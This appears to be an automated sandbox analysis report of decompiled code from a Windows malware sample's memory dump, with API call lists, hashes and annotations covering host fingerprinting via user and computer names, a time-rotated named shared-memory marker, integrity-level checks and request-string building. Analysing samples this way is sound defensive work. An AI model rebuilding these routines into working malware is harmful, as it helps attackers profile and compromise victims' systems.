                                                        								}
                                                        							}
                                                        						}
                                                        						L25:
                                                        					}
                                                        					L12:
                                                        					_t78 =  &_v92;
                                                        					_t71 = 3;
                                                        					do {
                                                        						_t54 =  *_t78;
                                                        						if(_t54 != 0) {
                                                        							RtlFreeHeap( *0x120a290, 0, _t54); // executed
                                                        						}
                                                        						_t78 =  &(_t78[4]);
                                                        						_t71 = _t71 - 1;
                                                        					} while (_t71 != 0);
                                                        					CloseHandle(_v44);
                                                        				}
                                                        				return _v8;
                                                        				goto L25;
                                                        			}

                                                        APIs
                                                        • memset.NTDLL ref: 012050B8
                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012050C4
                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 012050E9
                                                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01205105
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0120511E
                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 012051B3
                                                        • CloseHandle.KERNEL32(?), ref: 012051C2
                                                        • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012051FC
                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,01204579), ref: 01205212
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0120521D
                                                          • Part of subcall function 01205335: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05769318,00000000,?,74B5F710,00000000,74B5F730), ref: 01205384
                                                          • Part of subcall function 01205335: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05769350,?,00000000,30314549,00000014,004F0053,0576930C), ref: 01205421
                                                          • Part of subcall function 01205335: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01205131), ref: 01205433
                                                        • GetLastError.KERNEL32 ref: 0120522F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                        • String ID:
                                                        • API String ID: 3521023985-0
                                                        • Opcode ID: 3d65084c488155e8789b24329d3c09d433151a001990d1cd42d7a63ed78fdfc3
                                                        • Instruction ID: a8697fc14c29c2568937ba07f3ad732d8b51674b55cabc838d84edf0dc73537f
                                                        • Opcode Fuzzy Hash: 3d65084c488155e8789b24329d3c09d433151a001990d1cd42d7a63ed78fdfc3
                                                        • Instruction Fuzzy Hash: CA512A7181122AAFDF22DF949C889EEBFB9EF05724F104216F515A2196D7719640CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 74%
                                                        			E012066CE(intOrPtr __edx, void** _a4, void** _a8) {
                                                        				intOrPtr _v8;
                                                        				struct _FILETIME* _v12;
                                                        				short _v56;
                                                        				struct _FILETIME* _t12;
                                                        				intOrPtr _t13;
                                                        				void* _t17;
                                                        				void* _t21;
                                                        				intOrPtr _t27;
                                                        				long _t28;
                                                        				void* _t30;
                                                        
                                                        				_t27 = __edx;
                                                        				_t12 =  &_v12;
                                                        /* 0x012066da */				GetSystemTimeAsFileTime(_t12); // _t12 == &_v12: current time as a 64-bit FILETIME in _v12:_v8
                                                        /* 0x012066e0 */				_push(0x192);
                                                        /* 0x012066e5 */				_push(0x54d38000);
                                                        /* 0x012066ea */				_push(_v8);
                                                        /* 0x012066ed */				_push(_v12);
                                                        /* 0x012066f0 */				L01207DD6(); // _aulldiv: FILETIME / 0x19254d38000; the divisor is 1,728,000,000,000 x 100 ns = 48 hours, so the quotient only changes every two days
                                                        /* 0x012066f5 */				_push(_t12);
                                                        /* 0x012066f6 */				_v12 = _t12;
                                                        /* 0x012066f9 */				_t13 =  *0x120a2d4; // 0x455d5a8
                                                        /* 0x012066fe */				_t5 = _t13 + 0x120b84d; // 0x5768df5 (pointer to a narrow string, see the %S below)
                                                        /* 0x01206705 */				_t6 = _t13 + 0x120b580; // 0x530025 == L"%S": first code units of the wide format string
                                                        /* 0x0120670f */				_push(0x16);
                                                        /* 0x01206711 */				_push( &_v56);
                                                        /* 0x01206712 */				_v8 = _t27;
                                                        /* 0x01206715 */				L01207ABA(); // _snwprintf(&_v56, 0x16, fmt = _t6, ...): the visible L"%S" directive consumes the narrow string at _t5 and the _aulldiv quotient pushed above is a further argument; the rest of the format is not visible in this dump
                                                        /* 0x01206731 */				_t17 = CreateFileMappingW(0xffffffff, 0x120a2f8, 4, 0, 0x1000,  &_v56); // executed; INVALID_HANDLE_VALUE (pagefile-backed), SECURITY_ATTRIBUTES at 0x120a2f8 (filled in by the caller E0120435F), PAGE_READWRITE, 0x1000 bytes, named with the string just formatted
                                                        /* 0x01206737 */				_t30 = _t17;
                                                        /* 0x0120673b */				if(_t30 == 0) {
                                                        /* 0x01206789 */					_t28 = GetLastError();
                                                        /* 0x0120673d */				} else {
                                                        /* 0x0120674a */					if(GetLastError() == 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS: another instance created this section before us
                                                        /* 0x0120675a */						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed; 6 == FILE_MAP_READ | FILE_MAP_WRITE
                                                        /* 0x01206762 */						if(_t21 == 0) {
                                                        /* 0x01206774 */							_t28 = GetLastError();
                                                        /* 0x01206778 */							if(_t28 != 0) {
                                                                        								goto L6;
                                                                        							}
                                                        /* 0x01206764 */						} else {
                                                        /* 0x01206767 */							 *_a4 = _t30;
                                                        /* 0x0120676c */							 *_a8 = _t21;
                                                        /* 0x0120676e */							_t28 = 0;
                                                        /* 0x0120676e */						}
                                                        /* 0x0120674c */					} else {
                                                        /* 0x0120674e */						_t28 = 2; // the section did not exist yet (this process created it): release it and report 2
                                                        /* 0x0120677a */						L6:
                                                        /* 0x0120677b */						CloseHandle(_t30);
                                                        /* 0x0120677b */					}
                                                        /* 0x0120674a */				}
                                                        /* 0x01206790 */				return _t28; // 0 only when a pre-existing section was found and mapped (*_a4 = handle, *_a8 = view)
                                                                        			}

                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,012043F5,?,00000001,?), ref: 012066DA
                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 012066F0
                                                        • _snwprintf.NTDLL ref: 01206715
                                                        • CreateFileMappingW.KERNELBASE(000000FF,0120A2F8,00000004,00000000,00001000,?), ref: 01206731
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5,?), ref: 01206743
                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0120675A
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5), ref: 0120677B
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5,?), ref: 01206783
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                        • String ID:
                                                        • API String ID: 1814172918-0
                                                        • Opcode ID: 444cab79beb39455e44c72cc0a637dc52283d9622e4a584a676288c260b43f84
                                                        • Instruction ID: 7a5120f60bf2447ded46a5bc4dd2f34db87a61b7516d605b544f6c02affab95e
                                                        • Opcode Fuzzy Hash: 444cab79beb39455e44c72cc0a637dc52283d9622e4a584a676288c260b43f84
                                                        • Instruction Fuzzy Hash: 9A21F676640204BFDB27DB68DC49F9D7BB9EB44750F204321FA06E71D3EA709A408760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E0120435F(signed int __edx) {
                                                        				signed int _v8;
                                                        				long _v12;
                                                        				signed int _v16;
                                                        				long _v20;
                                                        				void* _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				char _v40;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* _t27;
                                                        				long _t28;
                                                        				long _t31;
                                                        				intOrPtr _t32;
                                                        				void* _t36;
                                                        				signed int _t37;
                                                        				intOrPtr _t38;
                                                        				void* _t39;
                                                        				CHAR* _t42;
                                                        				long _t48;
                                                        				long _t49;
                                                        				void* _t54;
                                                        				void* _t56;
                                                        				intOrPtr _t64;
                                                        				void* _t67;
                                                        				long _t71;
                                                        				void* _t72;
                                                        				signed char _t74;
                                                        				intOrPtr _t76;
                                                        				signed int _t77;
                                                        				long _t82;
                                                        				long _t84;
                                                        				CHAR* _t87;
                                                        				void* _t88;
                                                        
                                                        /* 0x0120435f */				_t79 = __edx;
                                                        /* 0x0120436a */				_v16 = 0;
                                                        /* 0x0120436d */				_v8 = 0;
                                                        /* 0x01204370 */				_v12 = 0;
                                                        /* 0x01204373 */				_t27 = E012069CE(); // subcall resolves a module via GetModuleHandleA (argument 0x4c44544e == "NTDL", see the API list)
                                                        /* 0x0120437a */				if(_t27 != 0) {
                                                        /* 0x0120437c */					_t77 =  *0x120a2b4; // 0x4000000a
                                                        /* 0x01204388 */					_t73 = (_t77 & 0xf0000000) + _t27;
                                                        /* 0x0120438a */					 *0x120a2b4 = (_t77 & 0xf0000000) + _t27;
                                                        /* 0x0120438a */				}
                                                        /* 0x01204393 */				_t28 =  *0x120a148(0, 2); // executed; indirect call through an unresolved import: the (NULL, 2) arguments and the accepted results 0, 1 and 0x80010106 (RPC_E_CHANGED_MODE) match CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); this is an inference, the dump does not name the target
                                                        /* 0x0120439b */				_v20 = _t28;
                                                        /* 0x0120439e */				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                                        /* 0x012043b8 */					_t31 = E0120570A( &_v8,  &_v16); // executed
                                                        /* 0x012043bd */					_push(0); // SecurityDescriptorSize = NULL
                                                        /* 0x012043be */					_t84 = _t31;
                                                        /* 0x012043c0 */					_t32 =  *0x120a2d4; // 0x455d5a8
                                                        /* 0x012043c5 */					_push(0x120a2fc); // &SECURITY_ATTRIBUTES.lpSecurityDescriptor
                                                        /* 0x012043ca */					_push(1); // SDDL_REVISION_1
                                                        /* 0x012043cc */					_t7 = _t32 + 0x120b5bc; // 0x4d283a53 == "S:(M": start of the SDDL string
                                                        /* 0x012043d3 */					 *0x120a2f8 = 0xc; // SECURITY_ATTRIBUTES.nLength = sizeof(SECURITY_ATTRIBUTES) on x86
                                                        /* 0x012043dd */					 *0x120a300 = 0; // SECURITY_ATTRIBUTES.bInheritHandle = FALSE
                                                        /* 0x012043e3 */					L01202BFF(); // ConvertStringSecurityDescriptorToSecurityDescriptorA(sddl, 1, &lpSecurityDescriptor, NULL) per the API list; the struct at 0x120a2f8 is the lpAttributes that E012066CE hands to CreateFileMappingW
                                                        /* 0x012043f0 */					_t36 = E012066CE(_t79,  &_v24,  &_v12); // executed; the section check above: 0 only if a pre-existing section was mapped (handle in _v24, view in _v12)
                                                        /* 0x012043f7 */					if(_t36 == 0) {
                                                        /* 0x012043fc */						CloseHandle(_v24);
                                                        /* 0x012043fc */					}
                                                        /* 0x01204405 */					if(_t84 != 5) { // 5 == ERROR_ACCESS_DENIED from E0120570A
                                                        /* 0x0120442e */						_t37 = _v16;
                                                        /* 0x01204431 */						__eflags = _t37;
                                                        /* 0x0120443e */						if(_t37 != 0) {
                                                        /* 0x01204445 */							E01206CD6(_t37 ^ 0xe8fa7dd7,  &_v40); // subcall reads GetUserNameW / GetComputerNameW (see the API list) and fills the four dwords _v40.._v28
                                                        /* 0x01204451 */							_t87 = E01205FBC(0x27); // 0x27-byte heap buffer (subcall: RtlAllocateHeap)
                                                        /* 0x01204453 */							__eflags = _t87;
                                                        /* 0x01204455 */							if(_t87 != 0) {
                                                        /* 0x0120445a */								asm("bswap eax"); // the four dwords are byte-swapped so the hex text below reads in memory order
                                                        /* 0x01204460 */								asm("bswap eax");
                                                        /* 0x01204466 */								asm("bswap eax");
                                                        /* 0x0120446c */								asm("bswap eax");
                                                        /* 0x0120446f */								_t64 =  *0x120a2d4; // 0x455d5a8
                                                        /* 0x01204474 */								_t18 = _t64 + 0x120b86f; // 0x78383025 == "%08x": start of the format string
                                                        /* 0x0120447c */								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28); // 4 x 8 hex digits = 32 characters plus NUL, fits the 0x27-byte buffer
                                                        /* 0x0120447e */								_t88 = _t88 + 0x18;
                                                        /* 0x0120447e */							}
                                                        /* 0x01204481 */							 *0x120a32c = _t87; // the hex identifier is kept in a global
                                                        /* 0x01204481 */						}
                                                        /* 0x01204487 */						_t38 = E01201262();
                                                        /* 0x0120448c */						 *0x120a2c8 =  *0x120a2c8 ^ 0xe8fa7dd7; // same XOR constant as above
                                                        /* 0x01204494 */						 *0x120a31c = _t38;
                                                        /* 0x01204499 */						_t39 = E01205FBC(0x60);
                                                        /* 0x0120449e */						__eflags = _t39;
                                                        /* 0x012044a0 */						 *0x120a37c = _t39;
                                                        /* 0x012044a5 */						if(_t39 == 0) {
                                                        /* 0x012044d4 */							_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                        /* 0x012044a7 */						} else {
                                                        /* 0x012044ac */							memset(_t39, 0, 0x60);
                                                        /* 0x012044b1 */							_t54 =  *0x120a37c; // 0x5769630
                                                        /* 0x012044b6 */							_t88 = _t88 + 0xc;
                                                        /* 0x012044bd */							__imp__(_t54 + 0x40); // RtlInitializeCriticalSection on the field at +0x40, per the API list (ref 012044BD)
                                                        /* 0x012044c3 */							_t56 =  *0x120a37c; // 0x5769630
                                                        /* 0x012044c8 */							 *_t56 = 0x120b85e;
                                                        /* 0x012044ce */							_t84 = 0;
                                                        /* 0x012044ce */						}
                                                        /* 0x012044d5 */						__eflags = _t84;
                                                        /* 0x012044d7 */						if(_t84 == 0) {
                                                        /* 0x012044e6 */							_t42 = RtlAllocateHeap( *0x120a290, _t84, 0x52); // flags = _t84 = 0, 0x52 bytes
                                                        /* 0x012044ec */							__eflags = _t42;
                                                        /* 0x012044ee */							 *0x120a314 = _t42;
                                                        /* 0x012044f3 */							if(_t42 == 0) {
                                                        /* 0x0120451f */								_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                        /* 0x012044f5 */							} else {
                                                        /* 0x012044f5 */								_t74 =  *0x120a2b4; // 0x4000000a
                                                        /* 0x012044fb */								_t79 = _t74 & 0x000000ff; // low byte only
                                                        /* 0x01204508 */								_t76 =  *0x120a2d4; // 0x455d5a8
                                                        /* 0x0120450e */								_t19 = _t76 + 0x120b212; // 0x697a6f4d == "Mozi": start of the format string
                                                        /* 0x0120450e */								_t73 = _t19;
                                                        /* 0x01204516 */								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x12092a7); // "Mozi..." format with the low byte twice and the string at 0x12092a7; only the first four bytes of the format are visible, so reading it as a User-Agent string is an inference
                                                        /* 0x01204518 */							}
                                                        /* 0x01204520 */							__eflags = _t84;
                                                        /* 0x01204522 */							if(_t84 == 0) {
                                                        /* 0x01204529 */								asm("sbb eax, eax");
                                                        /* 0x01204536 */								E01206CD6( ~_v8 &  *0x120a2c8, 0x120a00c); // executed
                                                        /* 0x01204540 */								_t84 = E0120725F(_t73);
                                                        /* 0x01204542 */								__eflags = _t84;
                                                        /* 0x01204544 */								if(_t84 != 0) {
                                                                        									goto L31;
                                                                        								}
                                                        /* 0x01204546 */								_t48 = E0120355C();
                                                        /* 0x0120454b */								__eflags = _t48;
                                                        /* 0x0120454d */								if(_t48 != 0) {
                                                        /* 0x01204554 */									__eflags = _v8;
                                                        /* 0x01204558 */									_t82 = _v12; // view of the pre-existing section, 0 if none was found
                                                        /* 0x0120455b */									if(_v8 != 0) {
                                                        /* 0x01204570 */										L30:
                                                        /* 0x01204574 */										_t49 = E012050A3(_t79, _t82, _v8); // executed
                                                        /* 0x01204579 */										_t84 = _t49;
                                                                        										goto L31;
                                                        /* 0x01204579 */									}
                                                        /* 0x0120455d */									__eflags = _t82;
                                                        /* 0x0120455f */									if(__eflags == 0) {
                                                                        										goto L31;
                                                                        									}
                                                        /* 0x01204561 */									_t23 = _t82 + 4; // 0x5
                                                        /* 0x0120456a */									_t84 = E01202A24(__eflags, _t23);
                                                        /* 0x0120456c */									__eflags = _t84;
                                                        /* 0x0120456e */									if(_t84 == 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                        /* 0x0120456e */								}
                                                        /* 0x01204551 */								_t84 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                        /* 0x01204551 */							}
                                                        /* 0x01204522 */						}
                                                        /* 0x01204407 */					} else {
                                                        /* 0x01204407 */						_t71 = _v12;
                                                        /* 0x0120440c */						if(_t71 == 0) {
                                                        /* 0x0120457b */							L31:
                                                        /* 0x0120457f */							if(_v20 == 0 || _v20 == 1) {
                                                        /* 0x01204587 */								 *0x120a14c(); // executed; indirect call, taken only when the init call at the top returned 0 or 1 (S_OK / S_FALSE): the matching uninitialise, CoUninitialize under the same inference
                                                        /* 0x01204587 */							}
                                                                        							goto L35;
                                                        /* 0x0120457f */						}
                                                        /* 0x01204412 */						_t72 = _t71 + 4;
                                                        /* 0x01204415 */						do {
                                                        /* 0x01204415 */							_push(1);
                                                        /* 0x01204417 */							_push(_t72);
                                                        /* 0x0120441a */							_t67 = 5;
                                                        /* 0x01204422 */						} while (E0120663C(_t67, 0) == 0x4c7); // retried while the call reports 0x4c7 == ERROR_CANCELLED
                                                        /* 0x01204429 */					}
                                                                        					goto L31;
                                                        /* 0x0120458f */				} else {
                                                        /* 0x0120458f */					_t84 = _t28; // init call failed: propagate its result
                                                        /* 0x01204592 */					L35:
                                                        /* 0x01204597 */					return _t84;
                                                        /* 0x01204597 */				}
                                                                        			}

                                                        APIs
                                                          • Part of subcall function 012069CE: GetModuleHandleA.KERNEL32(4C44544E,00000000,01204378,00000000,00000000,00000000,?,?,?,?,?,012068F7,?,00000001), ref: 012069DD
                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0120A2FC,00000000), ref: 012043E3
                                                        • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,012068F7,?,00000001), ref: 012043FC
                                                        • wsprintfA.USER32 ref: 0120447C
                                                        • memset.NTDLL ref: 012044AC
                                                        • RtlInitializeCriticalSection.NTDLL(057695F0), ref: 012044BD
                                                        • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 012044E6
                                                        • wsprintfA.USER32 ref: 01204516
                                                          • Part of subcall function 01206CD6: GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D0D
                                                          • Part of subcall function 01206CD6: RtlAllocateHeap.NTDLL(00000000,0120453B), ref: 01206D24
                                                          • Part of subcall function 01206CD6: GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D31
                                                          • Part of subcall function 01206CD6: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,0120453B,?,?,?,?,?,012068F7,?,00000001), ref: 01206D52
                                                          • Part of subcall function 01206CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D79
                                                          • Part of subcall function 01206CD6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01206D8D
                                                          • Part of subcall function 01206CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D9A
                                                          • Part of subcall function 01206CD6: HeapFree.KERNEL32(00000000,00000000), ref: 01206DB8
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                         • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                         • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                        • String ID:
                                                        • API String ID: 2910951584-0
                                                        • Opcode ID: 5297482a44ce48f6bccd4db507a437cc8b55b55cfdee140968e7a79f6e345426
                                                        • Instruction ID: 846a1adc24208f75ecda5553c7fd951d6d91961c93be113e84f846ad76a8d2bd
                                                        • Opcode Fuzzy Hash: 5297482a44ce48f6bccd4db507a437cc8b55b55cfdee140968e7a79f6e345426
                                                        • Instruction Fuzzy Hash: B051B371920216AFDB33EB68B849F6E7BB8AB14700F518325EB04E75C7D77599408B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01205FD1(long* _a4) {
                                                        				long _v8;
                                                        				void* _v12;
                                                        				void _v16;
                                                        				long _v20;
                                                        				int _t33;
                                                        				void* _t46;
                                                        
                                                        				_v16 = 1;
                                                        				_v20 = 0x2000;
                                                        				if( *0x120a2b4 > 5) {
                                                        					_v16 = 0;
                                                        					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                        						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                        						_v8 = 0;
                                                        						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                        						if(_v8 != 0) {
                                                        							_t46 = E01205FBC(_v8);
                                                        							if(_t46 != 0) {
                                                        								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                        								if(_t33 != 0) {
                                                        									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                        								}
                                                        								E012013CC(_t46);
                                                        							}
                                                        						}
                                                        						CloseHandle(_v12);
                                                        					}
                                                        				}
                                                        				 *_a4 = _v20;
                                                        				return _v16;
                                                        			}

                                                         Instruction addresses of the disassembly listing for E01205FD1 (instruction text not extracted): 0x01205fde, 0x01205fe5, 0x01205fec, 0x01206000, 0x0120600b, 0x01206023, 0x01206030, 0x01206033, 0x01206038, 0x01206043, 0x01206047, 0x01206056, 0x0120605a, 0x01206076, 0x01206076, 0x0120607a, 0x0120607a, 0x0120607f, 0x01206083, 0x01206089, 0x0120608a, 0x01206091, 0x01206097

                                                        APIs
                                                        • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01206003
                                                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 01206023
                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 01206033
                                                        • CloseHandle.KERNEL32(00000000), ref: 01206083
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 01206056
                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0120605E
                                                        • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0120606E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                         • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                         • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                        • String ID:
                                                        • API String ID: 1295030180-0
                                                        • Opcode ID: 26bd7eaa92024116e143820cbec8a6a07d1cba3f20d1464683155f9402dda146
                                                        • Instruction ID: 2398846408cad992b2202df4846fefcb3168f964bce7acf17e32f4a8e12fa0ad
                                                        • Opcode Fuzzy Hash: 26bd7eaa92024116e143820cbec8a6a07d1cba3f20d1464683155f9402dda146
                                                        • Instruction Fuzzy Hash: E1213C7590021EFFEB12DFA4DC48EAEBBBAFB04304F004165E611A7292D7715A54EB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E01207156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t13;
                                                        				char* _t19;
                                                        				char* _t28;
                                                        				void* _t33;
                                                        				void* _t34;
                                                        				char* _t36;
                                                        				void* _t38;
                                                        				intOrPtr* _t39;
                                                        				char* _t40;
                                                        				char* _t42;
                                                        				char* _t43;
                                                        
                                                        				_t34 = __edx;
                                                        				_push(__ecx);
                                                        				_t9 =  *0x120a2d4; // 0x455d5a8
                                                        				_t1 = _t9 + 0x120b61b; // 0x253d7325
                                                        				_t36 = 0;
                                                        				_t28 = E01203420(__ecx, _t1);
                                                        				if(_t28 != 0) {
                                                        					_t39 = __imp__;
                                                        					_t13 =  *_t39(_t28, _t38);
                                                        					_v8 = _t13;
                                                        					_t6 =  *_t39(_a4) + 1; // 0x5769631
                                                        					_t40 = E01205FBC(_v8 + _t6);
                                                        					if(_t40 != 0) {
                                                        						strcpy(_t40, _t28);
                                                        						_pop(_t33);
                                                        						__imp__(_t40, _a4);
                                                        						_t19 = E01206E5D(_t33, _t34, _t40, _a8); // executed
                                                        						_t36 = _t19;
                                                        						E012013CC(_t40);
                                                        						_t42 = E0120216C(StrTrimA(_t36, "="), _t36);
                                                        						if(_t42 != 0) {
                                                        							E012013CC(_t36);
                                                        							_t36 = _t42;
                                                        						}
                                                        						_t43 = E01204FE5(_t36, _t33);
                                                        						if(_t43 != 0) {
                                                        							E012013CC(_t36);
                                                        							_t36 = _t43;
                                                        						}
                                                        					}
                                                        					E012013CC(_t28);
                                                        				}
                                                        				return _t36;
                                                        			}

                                                         Instruction addresses of the disassembly listing for E01207156 (instruction text not extracted): 0x01207156, 0x01207159, 0x0120715a, 0x01207161, 0x01207168, 0x0120716f, 0x01207173, 0x0120717a, 0x01207181, 0x01207186, 0x0120718e, 0x01207198, 0x0120719c, 0x012071a0, 0x012071a6, 0x012071ab, 0x012071b5, 0x012071bb, 0x012071bd, 0x012071d4, 0x012071d8, 0x012071db, 0x012071e0, 0x012071e0, 0x012071e9, 0x012071ed, 0x012071f0, 0x012071f5, 0x012071f5, 0x012071ed, 0x012071f8, 0x012071fd, 0x01207203

                                                        APIs
                                                          • Part of subcall function 01203420: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0120716F,253D7325,00000000,00000000,?,00000000,01204A9F), ref: 01203487
                                                          • Part of subcall function 01203420: sprintf.NTDLL ref: 012034A8
                                                        • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                        • lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • strcpy.NTDLL ref: 012071A0
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01206E5D: lstrlen.KERNEL32(00000000,00000000,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 01206E6E
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                          • Part of subcall function 0120216C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,012071D4,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01202176
                                                          • Part of subcall function 0120216C: _snprintf.NTDLL ref: 012021D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                         • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                         • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                        • String ID: =
                                                        • API String ID: 2864389247-1428090586
